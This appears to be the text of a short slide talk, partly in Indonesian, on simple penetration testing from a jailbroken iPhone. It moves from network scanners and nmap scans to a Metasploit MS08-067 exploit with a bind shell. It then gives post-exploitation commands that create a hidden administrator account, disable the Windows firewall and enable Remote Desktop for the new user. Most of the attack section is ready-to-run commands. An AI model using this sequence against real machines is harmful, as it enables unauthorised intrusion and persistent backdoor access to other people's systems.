http://www.flickr.com/photos/32615508@N02/3047982712

{network security part 1}Penetration test sederhana dengan mobile device...

{network scan}Host discovery, find the targets

StumblerPlus , iWep PRO

iNet , Snap: Mobile version of pinger/scanner (ex: Angry IP Scanner)

{deeper profiling}Port scanning, OS detection etc.

Nmap 5.00Jailbroken iPhone etc.

$> nmap -O 192.168.5.44

Aha, microsoft-ds (port 445)plus XP SP2...

Or else...

$> nmap -p 445 192.168.5.0/24

{penetrations}Using exploits etc.

Metasploit Framework

$> msfconsole

Easy, many modules, reular updates, Ruby, can run nmap too.

Use Proper Modules

$> use windows/smb/ms08_067_netapi$> show options$> show payloads

Security knowledge & deduction

Set Options

$> set payload windows/shell_bind_tcp$> set rhost 192.168.5.44$> exploit

Welcome to C: Prompt

$> ipconfig$> dir$> net user$> net user guestboss guestboss /add$> net localgroup Administrators /add guestboss$> echo “P4wned!” > "c:\Documents and Settings\guestboss\Desktop\Hello.txt"

Shutdown Firewalll & Enable RDP

$> set opmode mode = DISABLE exceptions = ENABLE

$> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

$> net localgroup "Remote Desktop Users" /add guestboss

{conclusions?}..............................

Q & A